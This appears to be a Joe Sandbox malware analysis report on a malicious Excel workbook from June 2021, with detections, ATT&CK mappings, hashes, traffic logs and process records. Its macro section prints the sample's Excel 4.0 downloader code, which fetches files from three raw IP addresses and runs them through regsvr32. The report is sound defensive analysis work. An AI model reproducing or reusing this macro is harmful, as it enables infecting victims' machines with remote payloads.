Windows Analysis Report Decline-172917164-06242021.xlsm
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
18% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.234.247.7 | unknown | Russian Federation | 198004 | INTERKONEKT-ASPL | false | |
5.253.62.174 | unknown | Russian Federation | 57724 | DDOS-GUARDRU | false | |
185.117.73.74 | unknown | Netherlands | 60117 | HSAE | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 440340 |
Start date: | 25.06.2021 |
Start time: | 08:23:46 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Decline-172917164-06242021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.expl.evad.winXLSM@7/7@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
08:25:31 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
INTERKONEKT-ASPL | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
DDOS-GUARDRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 315878 |
Entropy (8bit): | 7.988901270632308 |
Encrypted: | false |
SSDEEP: | 6144:hRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN3:hRMmEv2Bc/nvm8IKABfsYOmauFD |
MD5: | BB737290D394078D8A16D5509C5BC970 |
SHA1: | C8A63B0AB1EB7745A0027E0A17A6CB4C6F79487E |
SHA-256: | E11121ECA3FAD55F66EA240EADD4F5B4C978828C94C34736F7673540529B17A5 |
SHA-512: | 3D8A6025171D283FA08D8A5BA4EAAD1EABAD55D7D34629F17F4C6601DD4438FB536B29D7B8CA71E540EDB782433118628EBD3A56CE8FFA453C6A45792425CB9A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 328749 |
Entropy (8bit): | 7.982562663364122 |
Encrypted: | false |
SSDEEP: | 6144:bnlXRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNe:blXRMmEv2Bc/nvm8IKABfsYOmauFjW |
MD5: | 1DDE60AF4802D997D564DCC19FCF8924 |
SHA1: | 01040AF635B254E2387CBDA2379A02C1ADD7B27B |
SHA-256: | 59B39E1F85E3318A929558831AB2D65DAAA38292B613F65BDB8DBFD28ACE14A3 |
SHA-512: | 64FBD728A651D17147655F1EF88F6EE6F8EF64ECC693A426E0A15F8E54294BF4D28D24B7C0649CBF5D020F66EB39D1C613EEB2C3576796B1F29CAD48D0BB864C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.50661144098561 |
Encrypted: | false |
SSDEEP: | 48:81/XT0jFDt262TB+Qh21/XT0jFDt262TB+Q/:81/XojFDyd+Qh21/XojFDyd+Q/ |
MD5: | 2D3FA1E5457926B56AE6600BA3D476FA |
SHA1: | 2F3FA829061E0BD5BF8F24F2EF63DDABB39E478D |
SHA-256: | FE15AAA8305867D305D2944ED0BB890D09964D52FE972D0B169E3281204520F6 |
SHA-512: | 33D321AC668DB01BEAF3D3E1831917FD85591D6A26D23AC3C20246736CAC7DFE271676CDBC0EBBA1CC18D2FB10B9671EF829F3F4AC88AAE82F6E6D3191AE6CE2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.47495889914137 |
Encrypted: | false |
SSDEEP: | 12:85QJF4FcLgXg/XAlCPCHaXtB8XzB/RwxX+WnicvbbbDtZ3YilMMEpxRljKzTdJP8:852D/XTd6jUxYejDv3q+rNru/ |
MD5: | 2580406BFAE06A1C59616E3B17B9C490 |
SHA1: | 7330C14D2F37BB8B2DBB21665DBE1F38C5342D06 |
SHA-256: | 4CA54148064EFC7BF7E77972F5F24F437F80F671C8DC0C6C1668737F5B6F5D61 |
SHA-512: | C2827E176CED0EC998DFFEEB8122DA69BECA81DDACDAB3277A85E4A15F0A920F9B040FB1F80640B36F977E401BB10B8F6F12512A4F4B05F4723B33B8B811ABF4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.587558026448006 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWqGLtgLZbRFK6l51MLtgLZbRFK6lmxWqGLtgLZbRFK6lv:djnLlPrJLlPoLlP1 |
MD5: | C583482E01AB0E15D757BF76E7C5D737 |
SHA1: | FAD60796DF25EA9F73455FEF5ACB980371425D1C |
SHA-256: | 39089D648F6A966B83E19AC3FEC4BF268C7574340248FE1700B47B497210812F |
SHA-512: | E8D50E7882FF9D6F3BAD87B167D4AD7BB4484966059E97D38FFF4F04E57318C3ABF21A02AD5B7E749694205077D174234C09D8469ADB04B7BB058253728061AD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 328749 |
Entropy (8bit): | 7.982577224576017 |
Encrypted: | false |
SSDEEP: | 6144:bnlXRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNa:blXRMmEv2Bc/nvm8IKABfsYOmauFjC |
MD5: | 4D63C3DCB6D2C3F5839B7FE96E34939D |
SHA1: | 8DAF3CA9BE70E9FE8BE12F12124F10E1AD077DDA |
SHA-256: | 744118B0D611EED117C6907221549EAE6D477206EDD837F30EE55FABC2D8E328 |
SHA-512: | 7278D22DD1495189808B45774FBC3E5CFCEDFDF012C2B0134569CD9A90CAC2EC34EF94DD0B9C190D58712925AAC5371ECEBBAAFFA411D0F1B432604CEEEE034B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.982649799738301 |
TrID: |
|
File name: | Decline-172917164-06242021.xlsm |
File size: | 329298 |
MD5: | f022a2159442cd4e16d7fe3dee1d634b |
SHA1: | cd4a698d83059462498e48b8dec47662bd2a0ec4 |
SHA256: | 4bd593279e649fae847a2b702655c571d7ca9e1949a422fa8d289250aeaa3305 |
SHA512: | ba433280caf91d3ee2b17848d398566e69802e1346573cbe16b4bb77045aa0a8739affcaa27e216018bb6b051dba2b6bf83503a88492b4aa470147c0c716a891 |
SSDEEP: | 6144:97u1GRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZw:97sGRMmEv2Bc/nvm8IKABfsYOmauFq |
File Content Preview: | PK..........!.^...............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Decline-172917164-06242021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)",http://5.253.62.174/,"=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)",http://185.117.73.74/,"=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)",http://185.234.247.7/,"=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,=EXEC(Sheet2!O22),,"=EXEC(Sheet2!O22&""1"")",,"=EXEC(Sheet2!O22&""2"")",,,,,,,,,,=HALT(),
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/25/21-08:24:40.521992 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
06/25/21-08:24:41.376990 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 190.2.158.155 | 192.168.2.22 | ||
06/25/21-08:24:45.028969 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 190.2.158.155 | 192.168.2.22 | ||
06/25/21-08:24:51.240465 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 190.2.158.155 | 192.168.2.22 | ||
06/25/21-08:25:04.623723 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 190.2.158.153 | 192.168.2.22 | ||
06/25/21-08:25:07.631782 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 190.2.158.153 | 192.168.2.22 | ||
06/25/21-08:25:10.979362 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 190.2.158.153 | 192.168.2.22 | ||
06/25/21-08:25:22.914129 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 25, 2021 08:24:40.336123943 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.425620079 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:24:40.425707102 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.426493883 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.515687943 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:24:40.521991968 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:24:40.522126913 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.545172930 CEST | 49166 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:24:43.553692102 CEST | 49166 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:24:49.560177088 CEST | 49166 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:01.576529980 CEST | 49167 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:04.584395885 CEST | 49167 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:10.590897083 CEST | 49167 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:22.668386936 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:22.716211081 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:25:22.716413975 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:22.717233896 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:22.763576984 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:25:22.914129019 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:25:22.914345026 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:45.528947115 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:25:45.529162884 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:26:27.916523933 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:26:27.916800976 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:26:40.231090069 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:26:40.231400967 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:26:40.282500982 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:26:40.320980072 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 5.253.62.174 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 25, 2021 08:24:40.426493883 CEST | 0 | OUT | |
Jun 25, 2021 08:24:40.521991968 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 185.234.247.7 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 25, 2021 08:25:22.717233896 CEST | 2 | OUT | |
Jun 25, 2021 08:25:22.914129019 CEST | 3 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 08:24:37 |
Start date: | 25/06/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f1c0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:23 |
Start date: | 25/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff790000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:23 |
Start date: | 25/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff790000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:23 |
Start date: | 25/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff790000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|